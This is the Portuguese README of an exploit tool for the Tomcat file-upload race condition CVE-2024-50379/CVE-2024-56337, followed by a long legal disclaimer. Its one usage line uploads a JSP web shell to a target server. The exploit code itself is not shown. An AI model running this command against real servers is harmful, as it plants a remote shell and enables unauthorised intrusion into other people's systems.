
tomcat CVE-2024-50379/CVE-2024-56337 exp de upload de arquivo com corrida de condições
Exploração manual é complicada, então fiz um exploit..
Uso:
shell.jsp é o arquivo shell, ggsl.jsp é o nome/caminho salvo no servidor alvo
./CVE-2024-50379 -u http://192.168.2.245:8080 -f shell.jsp -p ggsl.jsp


Esta ferramenta destina-se exclusivamente a ações de construção de segurança empresarial com autorização legal. Se precisar testar a usabilidade da ferramenta, monte seu próprio ambiente de destino.
Ao usar esta ferramenta para testes, você deve garantir que a ação esteja em conformidade com as leis e regulamentos locais e que tenha obtido autorização suficiente. Não escaneie alvos não autorizados.
Se você realizar qualquer ação ilegal ao usar esta ferramenta, deverá arcar com as consequências correspondentes. Não nos responsabilizamos por qualquer responsabilidade legal ou solidária.
Antes de instalar e usar esta ferramenta, leia atentamente e compreenda completamente todos os termos. Os termos de limitação, isenção de responsabilidade ou outros que envolvam seus direitos importantes podem ser destacados em negrito ou sublinhado para chamar sua atenção. A menos que você tenha lido completamente, entendido completamente e aceitado todos os termos deste acordo, por favor, não instale nem use esta ferramenta. Seu uso ou qualquer outra forma explícita ou implícita de aceitação deste acordo será considerado como tendo lido e concordado com os termos deste acordo.